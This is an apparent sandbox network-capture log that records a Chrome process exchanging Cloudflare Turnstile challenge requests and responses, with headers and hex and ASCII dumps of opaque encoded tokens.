                                                                                        CF-Chl-RetryAttempt: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:42 UTC16384OUTData Raw: 76 5f 38 66 33 62 34 36 31 32 33 38 30 37 34 32 31 31 3d 4a 56 68 7a 55 38 50 53 78 49 56 50 78 76 53 50 2d 45 6b 45 65 76 72 50 66 45 55 7a 47 4d 49 37 69 50 59 45 71 4d 49 72 69 6a 6d 50 36 45 76 4d 50 72 69 50 54 72 45 49 51 45 63 25 32 62 45 55 45 53 4d 4d 39 4d 4d 45 4c 5a 38 42 45 36 66 79 7a 45 79 7a 50 4e 67 45 4d 5a 50 4f 30 4c 76 71 7a 45 36 45 76 78 6a 45 4c 76 63 50 7a 45 46 50 32 77 2b 45 38 69 68 50 69 37 45 4e 5a 4b 36 2d 7a 61 64 46 73 49 41 38 45 45 4e 37 45 4a 78 7a 37 78 7a 50 59 45 43 79 45 64 7a 45 2d 37 7a 38 2d 7a 79 49 39 45 72 56 45 67 35 49 73 72 4b 49 30 38 4d 45 4f 78 35 24 50 56 41 76 4f 56 7a 63 49 6d 4d 63 59 74 38 51 5a 37 7a 45 43 38 69 49 39 53 72 56 45 36 2b 66 39 78 7a 37 53 30 2d 37 47 45 71 78 32 4b 41 68 44 48 41 66
                                                                                        Data Ascii: v_8f3b461238074211=JVhzU8PSxIVPxvSP-EkEevrPfEUzGMI7iPYEqMIrijmP6EvMPriPTrEIQEc%2bEUESMM9MMELZ8BE6fyzEyzPNgEMZPO0LvqzE6EvxjELvcPzEFP2w+E8ihPi7ENZK6-zadFsIA8EEN7EJxz7xzPYECyEdzE-7z8-zyI9ErVEg5IsrKI08MEOx5$PVAvOVzcImMcYt8QZ7zEC8iI9SrVE6+f9xz7S0-7GEqx2KAhDHAf
                                                                                        2024-12-18 01:10:42 UTC15641OUTData Raw: 49 2b 50 56 45 67 79 42 4d 6c 53 76 6d 42 37 4f 39 50 6b 33 44 33 31 6a 76 45 76 7a 50 72 45 47 45 24 53 50 69 45 79 7a 49 2b 45 42 45 79 7a 63 45 50 6e 45 4b 53 57 43 50 6c 72 76 6a 72 6d 50 2d 45 57 73 55 56 45 50 45 4c 45 63 72 50 4b 78 43 4d 72 37 45 47 45 4a 4d 45 56 50 4a 45 24 4d 24 52 50 77 45 72 62 45 69 50 65 45 43 5a 45 53 50 46 45 47 5a 50 45 38 6a 45 2b 45 63 33 44 46 33 4d 45 43 4d 50 6a 45 4c 45 50 68 45 61 5a 68 7a 49 68 45 52 45 61 79 24 6c 72 53 4d 4c 68 38 4d 50 30 45 57 45 74 56 50 2b 45 5a 4d 50 72 45 4c 72 63 45 43 37 50 4c 5a 72 45 24 37 50 52 45 61 4d 63 69 50 69 5a 37 5a 38 68 63 4b 5a 45 7a 74 55 51 48 45 71 78 63 59 50 4b 5a 4c 5a 45 36 4e 37 45 50 2b 72 4f 45 32 68 38 77 32 6a 45 55 45 74 5a 50 37 36 6d 37 2d 4d 24 52 45 64 34
                                                                                        Data Ascii: I+PVEgyBMlSvmB7O9Pk3D31jvEvzPrEGE$SPiEyzI+EBEyzcEPnEKSWCPlrvjrmP-EWsUVEPELEcrPKxCMr7EGEJMEVPJE$M$RPwErbEiPeECZESPFEGZPE8jE+Ec3DF3MECMPjELEPhEaZhzIhEREay$lrSMLh8MP0EWEtVP+EZMPrELrcEC7PLZrE$7PREaMciPiZ7Z8hcKZEztUQHEqxcYPKZLZE6N7EP+rOE2h8w2jEUEtZP76m7-M$REd4
                                                                                        2024-12-18 01:10:43 UTC330INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:42 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 26312
                                                                                        Connection: close
                                                                                        cf-chl-gen: ZikplPBnJx1OUywP24Ob+HRqqw3PQZZ/vekFFZZa5i6B2Se2KcZ/JOMewoc2D12tiV9nZtJr89LFzUoH$FFi/6OgR9hoyV79j
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b4653dd37c346-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:43 UTC1039INData Raw: 6f 6e 37 45 77 4a 65 52 74 4a 69 55 70 4d 65 46 6d 64 43 52 77 72 4f 4f 30 63 43 7a 6b 62 50 45 74 35 54 56 74 62 36 59 33 61 32 39 32 65 4f 5a 76 71 44 6f 71 63 72 67 37 61 66 61 76 39 33 4b 30 50 4f 73 71 63 6e 6f 39 4f 6a 52 31 72 58 79 7a 38 7a 72 77 64 37 4e 42 4d 66 59 30 73 6e 39 33 39 76 49 78 65 6e 2b 30 65 33 6f 33 78 48 51 35 76 45 57 42 4f 6f 65 31 66 50 7a 49 52 45 5a 2b 68 62 63 48 53 4c 6d 2b 42 30 69 36 77 45 42 36 41 4d 76 36 76 48 6e 41 67 73 31 4a 44 51 30 50 43 67 4e 2b 7a 34 42 4f 42 62 2b 42 6a 73 31 51 78 6f 64 48 55 59 4a 4e 78 31 50 52 30 68 44 4c 41 30 66 56 45 73 69 54 43 70 4c 47 6c 55 79 54 47 4a 57 4c 30 49 79 55 55 59 62 52 44 74 4c 4f 31 35 4c 59 6a 35 77 4d 6c 31 45 51 57 41 31 4d 30 73 7a 4d 6c 46 48 63 30 38 35 67 58 78
                                                                                        Data Ascii: on7EwJeRtJiUpMeFmdCRwrOO0cCzkbPEt5TVtb6Y3a292eOZvqDoqcrg7afav93K0POsqcno9OjR1rXyz8zrwd7NBMfY0sn939vIxen+0e3o3xHQ5vEWBOoe1fPzIREZ+hbcHSLm+B0i6wEB6AMv6vHnAgs1JDQ0PCgN+z4BOBb+Bjs1QxodHUYJNx1PR0hDLA0fVEsiTCpLGlUyTGJWL0IyUUYbRDtLO15LYj5wMl1EQWA1M0szMlFHc085gXx
                                                                                        2024-12-18 01:10:43 UTC1369INData Raw: 53 71 63 61 68 6c 62 44 4a 6c 61 65 33 72 4d 58 50 31 5a 4b 2b 6e 64 75 68 6e 75 4b 37 76 36 66 4a 33 75 48 6a 37 4d 32 2b 38 72 33 6b 35 4d 66 49 39 63 4c 54 77 2f 72 79 38 2f 6a 65 31 62 72 69 41 41 48 6d 30 50 37 59 33 77 76 38 2f 72 38 50 35 38 49 4b 36 77 62 64 45 65 51 48 47 66 44 78 44 68 6a 30 48 39 67 4d 30 77 34 63 34 66 76 64 46 41 6a 69 35 77 62 31 2f 51 67 4d 49 4f 4d 46 42 77 6b 71 4b 52 51 51 47 44 73 74 4c 53 30 66 4e 69 30 63 45 52 35 42 41 52 63 68 41 51 67 6c 46 67 67 4d 42 55 6c 4d 4d 42 38 6c 44 53 68 49 49 52 4d 6f 57 53 67 37 4d 7a 67 74 4e 52 6c 57 55 69 41 30 58 44 64 6e 5a 32 6f 39 52 69 59 74 58 30 4d 6f 62 46 35 56 61 47 30 75 51 30 39 63 55 56 70 66 65 31 4a 76 64 6d 52 30 55 33 74 5a 5a 58 68 61 6a 47 5a 72 5a 49 65 49 62 56
                                                                                        Data Ascii: SqcahlbDJlae3rMXP1ZK+nduhnuK7v6fJ3uHj7M2+8r3k5MfI9cLTw/ry8/je1briAAHm0P7Y3wv8/r8P58IK6wbdEeQHGfDxDhj0H9gM0w4c4fvdFAji5wb1/QgMIOMFBwkqKRQQGDstLS0fNi0cER5BARchAQglFggMBUlMMB8lDShIIRMoWSg7MzgtNRlWUiA0XDdnZ2o9RiYtX0MobF5VaG0uQ09cUVpfe1JvdmR0U3tZZXhajGZrZIeIbV
                                                                                        2024-12-18 01:10:43 UTC1369INData Raw: 77 36 61 6b 32 36 32 2b 31 74 47 66 79 39 58 62 35 74 62 67 35 4c 65 6d 32 37 32 70 35 4d 57 73 33 36 33 65 35 4f 76 65 76 38 44 59 75 4c 48 45 76 50 4b 31 36 66 7a 71 37 41 54 77 31 66 4c 65 31 63 61 39 31 75 37 63 33 2f 30 43 42 50 30 46 36 74 62 72 42 67 4c 36 45 52 63 48 39 52 48 64 44 4e 67 51 34 74 73 43 35 52 54 66 4c 41 66 6c 48 75 73 6f 4b 51 59 43 45 44 62 31 4e 69 4d 47 4d 77 59 6e 45 53 59 6f 4d 77 41 58 2f 44 51 59 4c 6b 5a 44 47 77 4d 6e 52 6b 73 36 4a 79 42 43 43 52 46 46 46 46 4d 68 45 52 6b 51 53 78 6c 4a 4c 55 31 65 4e 69 45 68 4f 7a 73 6a 50 31 6b 6b 5a 30 4a 71 57 55 31 74 4c 30 5a 76 63 55 73 78 5a 45 6c 69 4e 57 56 75 5a 6a 31 79 55 48 56 63 62 32 74 56 50 6c 64 53 56 6d 70 65 53 47 46 4d 61 6c 79 41 54 6f 5a 79 53 70 5a 51 53 57 61
                                                                                        Data Ascii: w6ak262+1tGfy9Xb5tbg5Lem272p5MWs363e5Ovev8DYuLHEvPK16fzq7ATw1fLe1ca91u7c3/0CBP0F6tbrBgL6ERcH9RHdDNgQ4tsC5RTfLAflHusoKQYCEDb1NiMGMwYnESYoMwAX/DQYLkZDGwMnRks6JyBCCRFFFFMhERkQSxlJLU1eNiEhOzsjP1kkZ0JqWU1tL0ZvcUsxZEliNWVuZj1yUHVcb2tVPldSVmpeSGFMalyAToZySpZQSWa
                                                                                        2024-12-18 01:10:43 UTC1369INData Raw: 4e 32 54 33 70 76 45 76 64 76 44 34 4c 32 35 31 64 57 31 78 39 44 73 33 4d 50 43 33 66 54 66 77 66 4c 30 38 71 33 54 37 4e 66 30 2b 4e 6a 35 75 39 6e 7a 75 4e 4d 4a 2b 39 6a 65 41 41 30 49 36 2b 77 4a 36 65 33 66 43 66 4d 43 34 78 6a 6b 35 75 62 78 31 65 2f 36 49 42 6e 32 41 4f 30 59 2f 50 4c 39 4b 66 33 2b 35 43 44 72 44 79 30 78 42 68 4d 70 44 50 55 69 4d 67 59 32 4b 68 38 78 43 54 51 53 46 66 6b 58 4d 78 59 6b 47 43 6f 6d 48 30 5a 4b 4b 45 41 72 4a 46 4e 54 42 30 34 57 52 45 78 4b 4a 55 70 48 4d 46 77 7a 48 7a 78 64 4e 79 30 59 59 6a 74 54 57 6c 34 65 4b 69 52 61 4b 79 67 70 51 46 49 31 54 7a 64 41 4e 6e 64 75 55 6a 31 32 61 6e 5a 2f 54 31 77 2b 66 48 4a 44 53 45 57 45 52 33 31 65 67 57 36 48 67 33 70 69 5a 59 5a 50 67 57 4e 53 6b 5a 53 5a 57 5a 4a 76
                                                                                        Data Ascii: N2T3pvEvdvD4L251dW1x9Ds3MPC3fTfwfL08q3T7Nf0+Nj5u9nzuNMJ+9jeAA0I6+wJ6e3fCfMC4xjk5ubx1e/6IBn2AO0Y/PL9Kf3+5CDrDy0xBhMpDPUiMgY2Kh8xCTQSFfkXMxYkGComH0ZKKEArJFNTB04WRExKJUpHMFwzHzxdNy0YYjtTWl4eKiRaKygpQFI1TzdANnduUj12anZ/T1w+fHJDSEWER31egW6Hg3piZYZPgWNSkZSZWZJv
                                                                                        2024-12-18 01:10:43 UTC1369INData Raw: 50 56 30 64 6d 6c 70 75 54 6c 32 4f 47 6e 35 39 2b 39 73 50 62 53 39 4f 2f 61 74 2f 57 35 78 37 62 31 34 66 6d 36 39 39 62 66 35 2f 34 42 30 38 62 43 33 65 76 74 41 39 44 61 7a 41 54 53 37 78 67 4d 30 64 62 53 45 64 4c 37 39 39 66 79 41 50 50 33 46 68 77 64 43 50 63 4b 36 68 72 37 2b 65 37 74 4a 53 6f 43 4b 6a 4d 58 37 51 67 75 47 79 6b 56 2b 43 59 58 4d 30 41 62 4d 54 70 43 46 7a 67 45 48 6b 63 33 42 54 67 5a 48 6b 77 37 52 79 45 4f 4b 6a 39 4a 45 52 6c 58 4a 78 4e 49 52 7a 6b 62 4e 68 73 56 48 57 45 63 55 43 4a 6b 58 31 35 71 4c 46 74 73 4d 47 74 4a 54 58 55 31 5a 32 6c 30 4f 55 31 53 50 46 52 49 50 6e 34 2f 63 32 73 2b 62 31 56 77 51 49 4e 70 69 45 5a 34 64 34 31 4b 65 33 74 37 6c 56 53 4c 54 31 42 75 6d 31 4a 62 58 47 68 62 57 70 78 78 6f 32 4a 62 65
                                                                                        Data Ascii: PV0dmlpuTl2OGn59+9sPbS9O/at/W5x7b14fm699bf5/4B08bC3evtA9DazATS7xgM0dbSEdL799fyAPP3FhwdCPcK6hr7+e7tJSoCKjMX7QguGykV+CYXM0AbMTpCFzgEHkc3BTgZHkw7RyEOKj9JERlXJxNIRzkbNhsVHWEcUCJkX15qLFtsMGtJTXU1Z2l0OU1SPFRIPn4/c2s+b1VwQINpiEZ4d41Ke3t7lVSLT1Bum1JbXGhbWpxxo2Jbe
                                                                                        2024-12-18 01:10:43 UTC1369INData Raw: 74 31 71 69 74 7a 4f 65 74 30 36 66 71 37 63 72 74 39 50 57 75 2f 62 58 31 30 76 33 39 39 4d 48 39 42 76 33 59 75 77 51 48 42 75 77 48 42 41 30 48 38 74 41 52 35 41 58 53 32 4e 59 44 32 2f 50 34 44 64 6f 64 43 77 76 64 39 52 38 51 48 2f 34 58 46 68 6e 70 46 68 30 6f 47 54 49 30 38 51 67 51 4a 54 44 31 38 68 49 30 4e 67 77 74 4d 66 30 2b 2b 7a 38 78 50 69 38 43 48 6b 73 39 43 69 4a 48 51 30 56 4e 49 54 51 50 4b 30 73 33 46 56 45 31 55 42 59 38 45 46 4e 57 4d 31 5a 64 58 68 64 6d 48 6c 34 37 5a 6d 5a 64 4b 6d 5a 75 5a 6b 45 6b 62 47 39 75 56 57 38 7a 54 30 56 76 4f 6c 4e 6d 61 33 52 38 67 32 30 2f 63 56 47 42 52 49 56 70 67 6b 71 46 61 59 52 4b 63 45 53 48 69 6d 65 4b 6b 5a 4a 4c 6d 6c 4b 53 62 35 71 61 6b 56 36 61 6f 70 70 31 57 4b 43 6a 6f 6f 6d 6a 5a 35
                                                                                        Data Ascii: t1qitzOet06fq7crt9PWu/bX10v399MH9Bv3YuwQHBuwHBA0H8tAR5AXS2NYD2/P4DdodCwvd9R8QH/4XFhnpFh0oGTI08QgQJTD18hI0NgwtMf0++z8xPi8CHks9CiJHQ0VNITQPK0s3FVE1UBY8EFNWM1ZdXhdmHl47ZmZdKmZuZkEkbG9uVW8zT0VvOlNma3R8g20/cVGBRIVpgkqFaYRKcESHimeKkZJLmlKSb5qakV6aopp1WKCjoomjZ5
                                                                                        2024-12-18 01:10:43 UTC1369INData Raw: 34 4d 7a 6a 73 71 72 45 39 72 62 6e 73 39 2b 37 31 74 44 71 76 74 72 51 35 38 4c 30 78 2f 6e 48 34 51 4d 43 79 76 73 4c 41 4d 37 47 36 41 66 56 46 65 6a 37 31 42 6e 34 45 64 76 32 38 42 50 66 45 66 51 6a 34 76 37 34 48 4f 62 65 41 52 33 72 42 75 63 6d 37 6a 48 7a 4a 66 4d 31 47 53 33 30 4b 52 30 78 2b 6a 7a 33 4e 41 4a 42 45 54 67 43 2b 68 30 2f 42 55 6b 74 4d 41 73 6e 49 55 38 50 4b 6b 39 46 45 31 51 51 53 78 63 7a 52 30 34 62 54 53 42 51 48 7a 74 46 53 43 4d 70 49 46 73 6c 61 55 46 66 4c 6d 77 6f 59 44 42 78 56 57 67 30 54 32 4e 73 4e 79 39 4e 65 7a 6f 7a 59 58 4a 41 57 31 6c 35 52 48 53 44 65 6b 63 2f 54 48 78 4d 5a 32 57 44 54 6b 64 31 68 56 47 56 62 59 39 61 6d 59 65 50 57 59 32 4c 6c 6c 39 58 64 59 68 6a 70 4a 2b 6e 5a 34 4f 46 6f 6d 79 74 66 61 42
                                                                                        Data Ascii: 4MzjsqrE9rbns9+71tDqvtrQ58L0x/nH4QMCyvsLAM7G6AfVFej71Bn4Edv28BPfEfQj4v74HObeAR3rBucm7jHzJfM1GS30KR0x+jz3NAJBETgC+h0/BUktMAsnIU8PKk9FE1QQSxczR04bTSBQHztFSCMpIFslaUFfLmwoYDBxVWg0T2NsNy9NezozYXJAW1l5RHSDekc/THxMZ2WDTkd1hVGVbY9amYePWY2Lll9XdYhjpJ+nZ4OFomytfaB
                                                                                        2024-12-18 01:10:43 UTC1369INData Raw: 62 76 4d 75 62 33 30 30 4f 36 35 39 50 44 36 41 2f 6e 58 39 65 62 34 2b 41 4d 4c 41 77 62 39 37 67 45 42 43 78 4d 4a 37 64 4c 31 32 52 4d 66 43 68 58 53 47 76 62 68 49 66 41 65 46 66 6e 66 49 78 30 44 36 78 37 70 34 69 58 78 4b 65 59 75 43 2f 55 31 42 53 6e 34 4b 66 6f 4a 2b 53 6b 4e 4f 7a 55 62 41 78 67 49 47 55 45 4b 43 55 4e 44 42 6b 49 4c 55 69 55 55 4a 69 31 4f 46 55 55 58 4c 78 59 39 47 46 74 52 54 42 73 35 49 6c 73 6b 55 6c 63 62 4a 7a 6f 6d 56 54 6c 6e 59 45 63 76 52 6a 46 68 4d 30 63 79 57 57 39 33 62 47 67 33 55 54 35 33 65 32 35 32 4e 30 4e 69 51 6e 46 56 67 33 77 2f 53 31 6c 4e 63 6b 74 71 66 30 64 6e 56 31 4b 42 5a 5a 4f 4f 54 31 74 32 69 31 4e 7a 59 32 47 52 59 33 36 54 57 33 64 72 5a 70 56 35 70 36 43 74 62 34 71 66 5a 34 4e 33 64 61 56 33
                                                                                        Data Ascii: bvMub300O659PD6A/nX9eb4+AMLAwb97gEBCxMJ7dL12RMfChXSGvbhIfAeFfnfIx0D6x7p4iXxKeYuC/U1BSn4KfoJ+SkNOzUbAxgIGUEKCUNDBkILUiUUJi1OFUUXLxY9GFtRTBs5IlskUlcbJzomVTlnYEcvRjFhM0cyWW93bGg3UT53e252N0NiQnFVg3w/S1lNcktqf0dnV1KBZZOOT1t2i1NzY2GRY36TW3drZpV5p6Ctb4qfZ4N3daV3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.1649745104.18.94.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:44 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:44 UTC379INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 18 Dec 2024 01:10:44 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: Hjwb+hXd0xfl+7Acb3MfJflagRW8E9bT0iU=$NkQlfOA1iZX0u8do
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b46619d1eef9d-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:44 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.1649747104.18.95.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:48 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 34408
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        CF-Chl-RetryAttempt: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:48 UTC16384OUTData Raw: 76 5f 38 66 33 62 34 36 31 32 33 38 30 37 34 32 31 31 3d 4a 56 68 7a 55 38 50 53 78 49 56 50 78 76 53 50 2d 45 6b 45 65 76 72 50 66 45 55 7a 47 4d 49 37 69 50 59 45 71 4d 49 72 69 6a 6d 50 36 45 76 4d 50 72 69 50 54 72 45 49 51 45 63 25 32 62 45 55 45 53 4d 4d 39 4d 4d 45 4c 5a 38 42 45 36 66 79 7a 45 79 7a 50 4e 67 45 4d 5a 50 4f 30 4c 76 71 7a 45 36 45 76 78 6a 45 4c 76 63 50 7a 45 46 50 32 77 2b 45 38 69 68 50 69 37 45 4e 5a 4b 36 2d 7a 61 64 46 73 49 41 38 45 45 4e 37 45 4a 78 7a 37 78 7a 50 59 45 43 79 45 64 7a 45 2d 37 7a 38 2d 7a 79 49 39 45 72 56 45 67 35 49 73 72 4b 49 30 38 4d 45 4f 78 35 24 50 56 41 76 4f 56 7a 63 49 6d 4d 63 59 74 38 51 5a 37 7a 45 43 38 69 49 39 53 72 56 45 36 2b 66 39 78 7a 37 53 30 2d 37 47 45 71 78 32 4b 41 68 44 48 41 66
                                                                                        Data Ascii: v_8f3b461238074211=JVhzU8PSxIVPxvSP-EkEevrPfEUzGMI7iPYEqMIrijmP6EvMPriPTrEIQEc%2bEUESMM9MMELZ8BE6fyzEyzPNgEMZPO0LvqzE6EvxjELvcPzEFP2w+E8ihPi7ENZK6-zadFsIA8EEN7EJxz7xzPYECyEdzE-7z8-zyI9ErVEg5IsrKI08MEOx5$PVAvOVzcImMcYt8QZ7zEC8iI9SrVE6+f9xz7S0-7GEqx2KAhDHAf
                                                                                        2024-12-18 01:10:48 UTC16384OUTData Raw: 49 2b 50 56 45 67 79 42 4d 6c 53 76 6d 42 37 4f 39 50 6b 33 44 33 31 6a 76 45 76 7a 50 72 45 47 45 24 53 50 69 45 79 7a 49 2b 45 42 45 79 7a 63 45 50 6e 45 4b 53 57 43 50 6c 72 76 6a 72 6d 50 2d 45 57 73 55 56 45 50 45 4c 45 63 72 50 4b 78 43 4d 72 37 45 47 45 4a 4d 45 56 50 4a 45 24 4d 24 52 50 77 45 72 62 45 69 50 65 45 43 5a 45 53 50 46 45 47 5a 50 45 38 6a 45 2b 45 63 33 44 46 33 4d 45 43 4d 50 6a 45 4c 45 50 68 45 61 5a 68 7a 49 68 45 52 45 61 79 24 6c 72 53 4d 4c 68 38 4d 50 30 45 57 45 74 56 50 2b 45 5a 4d 50 72 45 4c 72 63 45 43 37 50 4c 5a 72 45 24 37 50 52 45 61 4d 63 69 50 69 5a 37 5a 38 68 63 4b 5a 45 7a 74 55 51 48 45 71 78 63 59 50 4b 5a 4c 5a 45 36 4e 37 45 50 2b 72 4f 45 32 68 38 77 32 6a 45 55 45 74 5a 50 37 36 6d 37 2d 4d 24 52 45 64 34
                                                                                        Data Ascii: I+PVEgyBMlSvmB7O9Pk3D31jvEvzPrEGE$SPiEyzI+EBEyzcEPnEKSWCPlrvjrmP-EWsUVEPELEcrPKxCMr7EGEJMEVPJE$M$RPwErbEiPeECZESPFEGZPE8jE+Ec3DF3MECMPjELEPhEaZhzIhEREay$lrSMLh8MP0EWEtVP+EZMPrELrcEC7PLZrE$7PREaMciPiZ7Z8hcKZEztUQHEqxcYPKZLZE6N7EP+rOE2h8w2jEUEtZP76m7-M$REd4
                                                                                        2024-12-18 01:10:48 UTC1640OUTData Raw: 45 50 45 38 6a 50 69 7a 2b 4e 78 33 45 70 24 2d 32 55 5a 31 39 5a 2d 5a 50 7a 50 6b 54 57 61 43 56 45 6a 53 68 78 45 5a 4f 50 79 6e 78 63 72 48 56 7a 4d 6c 31 76 30 51 78 78 4e 52 38 56 53 38 48 7a 24 46 2d 65 45 37 37 74 69 50 77 6d 7a 78 78 41 77 44 78 38 52 70 44 31 65 45 50 42 63 76 63 46 37 4c 5a 72 42 4c 4c 79 74 79 43 48 39 4d 79 4b 6a 49 73 73 62 7a 32 4f 45 6b 50 43 32 4f 64 51 39 70 6c 47 34 75 4e 77 61 45 62 6e 53 74 4e 50 56 7a 50 49 30 5a 50 79 4c 75 4a 43 45 52 42 2d 71 45 50 4f 63 39 65 31 7a 49 48 50 33 6e 42 37 63 72 61 62 39 46 43 7a 73 6b 31 45 4d 68 38 72 73 55 52 31 7a 50 5a 45 41 65 4c 5a 49 44 4f 46 6b 68 78 49 68 50 54 43 38 67 63 76 41 6d 45 72 31 39 4e 45 6d 45 79 7a 72 63 7a 53 45 72 31 35 4e 65 34 45 7a 24 78 2d 41 72 45 61 4c
                                                                                        Data Ascii: EPE8jPiz+Nx3Ep$-2UZ19Z-ZPzPkTWaCVEjShxEZOPynxcrHVzMl1v0QxxNR8VS8Hz$F-eE77tiPwmzxxAwDx8RpD1eEPBcvcF7LZrBLLytyCH9MyKjIssbz2OEkPC2OdQ9plG4uNwaEbnStNPVzPI0ZPyLuJCERB-qEPOc9e1zIHP3nB7crab9FCzsk1EMh8rsUR1zPZEAeLZIDOFkhxIhPTC8gcvAmEr19NEmEyzrczSEr15Ne4Ez$x-ArEaL
                                                                                        2024-12-18 01:10:48 UTC1256INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:48 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 4472
                                                                                        Connection: close
                                                                                        cf-chl-out-s: uprlwIqW9hg0jrR8AOQXyGv4wTgT7JRERxdRvNAmr9yM0MUveIK4wkkeltjAeY7g96LF+POvj1TwXl1Dgc2k9EEKRuYYWw0EGb782bfG82RolgU2SFqA2utoWTrSEYimCWnoJ0D+JqmP8K0MV0gkoLsPFIBuFmN8qDAKp3Ms083aMZm5mQk0oGzhd12Xy/gUO+Q8/32EeUMIMwdIrVedHcTZp644pSrdZt+ihlb8GOpSBuayyO7G4XVEzETWTYG4yHGxJEsz3XHpAzZG9MEmG/g90kyoDRVlLHTuZFg+Zb8XNB5PhZwHz3NFrrCYkNeSYENpl4BLoZLXGkDPHnTba2npHlw8T/uNjHWoVO3wC3SG+EJxPrtT0wjmY2XM8GolfmW3vINKm7A0ykbXKDso0ywOl+x7hPNhpAVW8vPl+C/FalXQuU8gTCadNSY2TVhghf6epajUzkXLBh8/Ltoywne12UP+CiP+Aq/lf8aRsuOKAd2v6KZMRWzofbLyb6IG7woAGGZHEB/TlgWxkpwTL67dD6ThKO3CzC1v86/BZrBhlaBcS3bx6f6mlsS4D8A5TWG0kOWGPN9Zkr5lWRlNv9PiVMXpEzMI2Zs0jezsVi2TFO9CTcA9ZiG/l5byOfqBPGqjlS8EysHYA3sGFVuSR3optToRrb1Lq1YQRnK9NxFbJhZ0M246WrZl5NPTltta5qPwP7xpxs+ap6Cr9AKl035RHjBt2WrjUn05HyeAMcaVKTHbj2t8oh077WP5fLB+g5N+G/Y/wbEKtSmfEKcS0dcqcKqNo5dAC57Ftx6KZ0qtxHTBBFAhcTbPUoo7LS7B49EmNktCP6CXySbIl5a9MpWBPLK/xJv9x5p8zHpHcQ1Et+dFBK9R6IpdHyoVDm2RikH909/P